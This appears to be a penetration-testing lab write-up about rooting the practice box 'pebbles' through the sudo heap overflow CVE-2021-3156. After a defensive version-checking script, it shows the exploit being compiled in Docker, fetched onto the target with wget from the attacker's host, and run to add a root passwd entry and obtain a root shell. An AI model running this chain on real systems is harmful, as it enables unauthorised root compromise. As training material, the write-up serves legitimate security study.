CVE-2021-3156


PEAS has identified that the target system is vulnerable to CVE-2021-3156

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
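Before chasing an exploit, the first thing worth confirming is whether the installed sudo actually falls inside the affected range. The helper below is an added example, not code from the page or from the PEAS project: it parses the first line of `sudo -V` output and compares the version against the ranges published in the advisory for CVE-2021-3156 (legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). The sample `sudo -V` text embedded in it is constructed.

```python
import re
from typing import Optional, Tuple

# (major, minor, patch, p-level); "1.8.31p2" becomes (1, 8, 31, 2).
Version = Tuple[int, int, int, int]

# Affected ranges from the public advisory for CVE-2021-3156.
# Legacy branch: 1.8.2 .. 1.8.31p2; stable branch: 1.9.0 .. 1.9.5p1.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# Matches "1.8.31p2", "1.9.5" or "1.8.16"; the patch and p-level parts are optional.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?")


def parse_sudo_version(text: str) -> Optional[Version]:
    """Extract the first version tuple from `sudo -V` output or a bare version string."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch or 0), int(plevel or 0))


def is_affected_version(version: Version) -> bool:
    """True if the upstream version number lies in one of the advisory's affected ranges."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def assess(sudo_v_output: str) -> str:
    """Classify `sudo -V` output as 'affected', 'not affected' or 'unknown'."""
    version = parse_sudo_version(sudo_v_output)
    if version is None:
        return "unknown"
    return "affected" if is_affected_version(version) else "not affected"


if __name__ == "__main__":
    # Constructed sample of what `sudo -V` prints on an old, unpatched build.
    sample = "Sudo version 1.8.31p2\nSudoers policy plugin version 1.8.31p2\n"
    print(parse_sudo_version(sample), assess(sample))   # (1, 8, 31, 2) affected
    print(assess("Sudo version 1.9.5p2"))              # not affected
```

The version number alone is only a first filter: distributions backport the fix without bumping the upstream version, so a package that reports an "affected" version may already be patched. Confirm through the package changelog or with the advisory's documented check, running `sudoedit -s /` as an unprivileged user: an unpatched build answers with `sudoedit: /: not a regular file`, a patched one prints the usage message instead.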

Exploit


Exploit found online

www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
 * gcc
 * clang
 * tcc
Ask your administrator to install one of them

No compiler is available on the target, so the exploit is compiled remotely instead.

Docker Exploit Development


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04      
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
 
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Setting up the environment

root@ed4ffa517958:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156 ; gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl ; cd .. ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156 ; cp CVE-2021-3156.tar.gz host/

Downloading, compiling, and packaging the exploit

Exploitation


www-data@pebbles:/var/tmp$ wget -q http://192.168.45.192/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd ./CVE-2021-3156

Delivery complete

www-data@pebbles:/var/tmp/CVE-2021-3156$ python3 exploit_userspec.py
 
[....REDACTED...]
 
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x2b24103e57e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x2b24103ee37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x2b24103f253c]
/usr/lib/sudo/sudoers.so(+0x2781f)[0x2b241163081f]
/usr/lib/sudo/sudoers.so(+0x135e6)[0x2b241161c5e6]
/usr/lib/sudo/sudoers.so(+0x192d6)[0x2b24116222d6]
/usr/lib/sudo/libsudo_util.so.0(+0x494d)[0x2b241015e94d]
/usr/lib/sudo/libsudo_util.so.0(sudo_fatalx_nodebug_v1+0xa3)[0x2b241015ed93]
sudoedit(+0x170dc)[0x564c6be210dc]
sudoedit(+0x698f)[0x564c6be1098f]
/usr/lib/sudo/sudoers.so(+0x6ede)[0x2b241160fede]
/usr/lib/sudo/sudoers.so(+0x77a6)[0x2b24116107a6]
/lib/x86_64-linux-gnu/libpam.so.0(pam_vprompt+0xc0)[0x2b241185edf0]
/lib/x86_64-linux-gnu/libpam.so.0(pam_prompt+0x8a)[0x2b241185f03a]
/lib/x86_64-linux-gnu/security/pam_unix.so(+0x6667)[0x2b2411c6f667]
/lib/x86_64-linux-gnu/security/pam_unix.so(pam_sm_authenticate+0x21c)[0x2b2411c6c5cc]
/lib/x86_64-linux-gnu/libpam.so.0(+0x2ea6)[0x2b2411859ea6]
/lib/x86_64-linux-gnu/libpam.so.0(pam_authenticate+0x2d)[0x2b241185961d]
/usr/lib/sudo/sudoers.so(+0x7d6e)[0x2b2411610d6e]
/usr/lib/sudo/sudoers.so(+0x7146)[0x2b2411610146]
/usr/lib/sudo/sudoers.so(+0x8d73)[0x2b2411611d73]
/usr/lib/sudo/sudoers.so(+0x1ab08)[0x2b2411623b08]
/usr/lib/sudo/sudoers.so(+0x1494f)[0x2b241161d94f]
sudoedit(+0x4ecf)[0x564c6be0eecf]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x2b241038e830]
sudoedit(+0x67e9)[0x564c6be107e9]
======= Memory map: ========
2b240f8e6000-2b240f90c000 r-xp 00000000 08:01 262165                     /lib/x86_64-linux-gnu/ld-2.23.so
2b240f90c000-2b240f90d000 rw-p 00000000 00:00 0 
2b240f915000-2b240f91b000 rw-p 00000000 00:00 0 
2b240f91b000-2b240f95b000 r-xp 00000000 08:01 262242                     /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240f95b000-2b240f95e000 r--p 0003f000 08:01 262242                     /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240f95e000-2b240f95f000 rw-p 00042000 08:01 262242                     /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240fb0b000-2b240fb0c000 r--p 00025000 08:01 262165                     /lib/x86_64-linux-gnu/ld-2.23.so
2b240fb0c000-2b240fb0d000 rw-p 00026000 08:01 262165                     /lib/x86_64-linux-gnu/ld-2.23.so
2b240fb0d000-2b240fb0e000 rw-p 00000000 00:00 0 
2b240fb0e000-2b240fb2a000 r-xp 00000000 08:01 262185                     /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fb2a000-2b240fd29000 ---p 0001c000 08:01 262185                     /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd29000-2b240fd2a000 r--p 0001b000 08:01 262185                     /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd2a000-2b240fd2b000 rw-p 0001c000 08:01 262185                     /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd2b000-2b240fd35000 rw-p 00000000 00:00 0 
2b240fd35000-2b240fd54000 r-xp 00000000 08:01 262873                     /lib/x86_64-linux-gnu/libselinux.so.1
2b240fd54000-2b240ff53000 ---p 0001f000 08:01 262873                     /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff53000-2b240ff54000 r--p 0001e000 08:01 262873                     /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff54000-2b240ff55000 rw-p 0001f000 08:01 262873                     /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff55000-2b240ff57000 rw-p 00000000 00:00 0 
2b240ff57000-2b240ff59000 r-xp 00000000 08:01 262233                     /lib/x86_64-linux-gnu/libutil-2.23.so
2b240ff59000-2b2410158000 ---p 00002000 08:01 262233                     /lib/x86_64-linux-gnu/libutil-2.23.so
2b2410158000-2b2410159000 r--p 00001000 08:01 262233                     /lib/x86_64-linux-gnu/libutil-2.23.so
2b2410159000-2b241015a000 rw-p 00002000 08:01 262233                     /lib/x86_64-linux-gnu/libutil-2.23.so
2b241015a000-2b241016c000 r-xp 00000000 08:01 2106                       /usr/lib/sudo/libsudo_util.so.0.0.0
2b241016c000-2b241036c000 ---p 00012000 08:01 2106                       /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036c000-2b241036d000 r--p 00012000 08:01 2106                       /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036d000-2b241036e000 rw-p 00013000 08:01 2106                       /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036e000-2b241052e000 r-xp 00000000 08:01 262225                     /lib/x86_64-linux-gnu/libc-2.23.so
2b241052e000-2b241072e000 ---p 001c0000 08:01 262225                     /lib/x86_64-linux-gnu/libc-2.23.so
2b241072e000-2b2410732000 r--p 001c0000 08:01 262225                     /lib/x86_64-linux-gnu/libc-2.23.so
2b2410732000-2b2410734000 rw-p 001c4000 08:01 262225                     /lib/x86_64-linux-gnu/libc-2.23.so
2b2410734000-2b2410738000 rw-p 00000000 00:00 0 
2b2410738000-2b24107a6000 r-xp 00000000 08:01 262856                     /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24107a6000-2b24109a6000 ---p 0006e000 08:01 262856                     /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a6000-2b24109a7000 r--p 0006e000 08:01 262856                     /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a7000-2b24109a8000 rw-p 0006f000 08:01 262856                     /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a8000-2b24109ab000 r-xp 00000000 08:01 262162                     /lib/x86_64-linux-gnu/libdl-2.23.so
2b24109ab000-2b2410baa000 ---p 00003000 08:01 262162                     /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410baa000-2b2410bab000 r--p 00002000 08:01 262162                     /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410bab000-2b2410bac000 rw-p 00003000 08:01 262162                     /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410bac000-2b2410bc4000 r-xp 00000000 08:01 262166                     /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410bc4000-2b2410dc3000 ---p 00018000 08:01 262166                     /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc3000-2b2410dc4000 r--p 00017000 08:01 262166                     /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc4000-2b2410dc5000 rw-p 00018000 08:01 262166                     /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc5000-2b2410dc9000 rw-p 00000000 00:00 0 
2b2410dc9000-2b2410dd1000 r-xp 00000000 08:01 262226                     /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410dd1000-2b2410fd0000 ---p 00008000 08:01 262226                     /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd0000-2b2410fd1000 r--p 00007000 08:01 262226                     /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd1000-2b2410fd2000 rw-p 00008000 08:01 262226                     /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd2000-2b2410fe8000 r-xp 00000000 08:01 262202                     /lib/x86_64-linux-gnu/libnsl-2.23.so
2b2410fe8000-2b24111e7000 ---p 00016000 08:01 262202                     /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e7000-2b24111e8000 r--p 00015000 08:01 262202                     /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e8000-2b24111e9000 rw-p 00016000 08:01 262202                     /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e9000-2b24111eb000 rw-p 00000000 00:00 0 
2b24111eb000-2b24111f6000 r-xp 00000000 08:01 262173                     /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24111f6000-2b24113f5000 ---p 0000b000 08:01 262173                     /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f5000-2b24113f6000 r--p 0000a000 08:01 262173                     /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f6000-2b24113f7000 rw-p 0000b000 08:01 262173                     /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f7000-2b2411402000 r-xp 00000000 08:01 262209                     /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411402000-2b2411601000 ---p 0000b000 08:01 262209                     /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411601000-2b2411602000 r--p 0000a000 08:01 262209                     /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411602000-2b2411603000 rw-p 0000b000 08:01 262209                     /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411603000-2b2411609000 rw-p 00000000 00:00 0 
2b2411609000-2b2411654000 r-xp 00000000 08:01 2098                       /usr/lib/sudo/sudoers.so
2b2411654000-2b2411853000 ---p 0004b000 08:01 2098                       /usr/lib/sudo/sudoers.so
2b2411853000-2b2411854000 r--p 0004a000 08:01 2098                       /usr/lib/sudo/sudoers.so
2b2411854000-2b2411856000 rw-p 0004b000 08:01 2098                       /usr/lib/sudo/sudoers.so
2b2411856000-2b2411857000 rw-p 00000000 00:00 0 
2b2411857000-2b2411864000 r-xp 00000000 08:01 262239                     /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411864000-2b2411a63000 ---p 0000d000 08:01 262239                     /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a63000-2b2411a64000 r--p 0000c000 08:01 262239                     /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a64000-2b2411a65000 rw-p 0000d000 08:01 262239                     /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a65000-2b2411a68000 r-xp 00000000 08:01 262323                     /lib/x86_64-linux-gnu/security/pam_env.so
2b2411a68000-2b2411c67000 ---p 00003000 08:01 262323                     /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c67000-2b2411c68000 r--p 00002000 08:01 262323                     /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c68000-2b2411c69000 rw-p 00003000 08:01 262323                     /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c69000-2b2411c77000 r-xp 00000000 08:01 262330                     /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411c77000-2b2411e76000 ---p 0000e000 08:01 262330                     /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e76000-2b2411e77000 r--p 0000d000 08:01 262330                     /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e77000-2b2411e78000 rw-p 0000e000 08:01 262330                     /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e78000-2b2411e84000 rw-p 00000000 00:00 0 
2b2411e84000-2b2411e8d000 r-xp 00000000 08:01 262201                     /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b2411e8d000-2b241208c000 ---p 00009000 08:01 262201                     /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208c000-2b241208d000 r--p 00008000 08:01 262201                     /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208d000-2b241208e000 rw-p 00009000 08:01 262201                     /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208e000-2b24120bc000 rw-p 00000000 00:00 0 
2b24120bc000-2b24120bd000 r-xp 00000000 08:01 262320                     /lib/x86_64-linux-gnu/security/pam_deny.so
2b24120bd000-2b24122bc000 ---p 00001000 08:01 262320                     /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122bc000-2b24122bd000 r--p 00000000 08:01 262320                     /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122bd000-2b24122be000 rw-p 00001000 08:01 262320                     /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122be000-2b24122bf000 r-xp 00000000 08:01 262317                     /lib/x86_64-linux-gnu/security/pam_permit.so
2b24122bf000-2b24124be000 ---p 00001000 08:01 262317                     /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124be000-2b24124bf000 r--p 00000000 08:01 262317                     /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124bf000-2b24124c0000 rw-p 00001000 08:01 262317                     /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124c0000-2b24124c2000 r-xp 00000000 08:01 262295                     /lib/x86_64-linux-gnu/security/pam_umask.so
2b24124c2000-2b24126c1000 ---p 00002000 08:01 262295                     /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c1000-2b24126c2000 r--p 00001000 08:01 262295                     /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c2000-2b24126c3000 rw-p 00002000 08:01 262295                     /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c3000-2b24126ca000 r-xp 00000000 08:01 262159                     /lib/x86_64-linux-gnu/librt-2.23.so
2b24126ca000-2b24128c9000 ---p 00007000 08:01 262159                     /lib/x86_64-linux-gnu/librt-2.23.so
2b24128c9000-2b24128ca000 r--p 00006000 08:01 262159                     /lib/x86_64-linux-gnu/librt-2.23.so
2b24128ca000-2b24128cb000 rw-p 00007000 08:01 262159                     /lib/x86_64-linux-gnu/librt-2.23.so
2b24128cb000-2b24128ce000 r-xp 00000000 08:01 262214                     /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b24128ce000-2b2412acd000 ---p 00003000 08:01 262214                     /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412acd000-2b2412ace000 r--p 00002000 08:01 262214                     /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412ace000-2b2412acf000 rw-p 00003000 08:01 262214                     /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412acf000-2b2412ae5000 r-xp 00000000 08:01 262802                     /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2412ae5000-2b2412ce4000 ---p 00016000 08:01 262802                     /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2412ce4000-2b2412ce5000 rw-p 00015000 08:01 262802                     /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2414000000-2b2414021000 rw-p 00000000 00:00 0 
2b2414021000-2b2418000000 ---p 00000000 00:00 0 
564c6be0a000-564c6be2a000 r-xp 00000000 08:01 2110                       /usr/bin/sudo
564c6c029000-564c6c02a000 r--p 0001f000 08:01 2110                       /usr/bin/sudo
564c6c02a000-564c6c02b000 rw-p 00020000 08:01 2110                       /usr/bin/sudo
564c6c02b000-564c6c02d000 rw-p 00000000 00:00 0 
564c6db30000-564c6db51000 rw-p 00000000 00:00 0                          [heap]
7fffd23e5000-7fffd240b000 rw-p 00000000 00:00 0                          [stack]
7fffd250f000-7fffd2511000 r--p 00000000 00:00 0                          [vvar]
7fffd2511000-7fffd2513000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
 
offset to first userspec: 0x370
 
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
 
to skip finding offsets next time no this machine, run: 
./exploit_userspec.py 0x1230 0x60 0x370 0x0
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 6456

The brute-force took about 30 minutes.

www-data@pebbles:/var/tmp/CVE-2021-3156$ su gg
Password: gg
 
root@pebbles:/var/tmp/CVE-2021-3156# whoami
root
root@pebbles:/var/tmp/CVE-2021-3156# hostname
pebbles
root@pebbles:/var/tmp/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
    inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise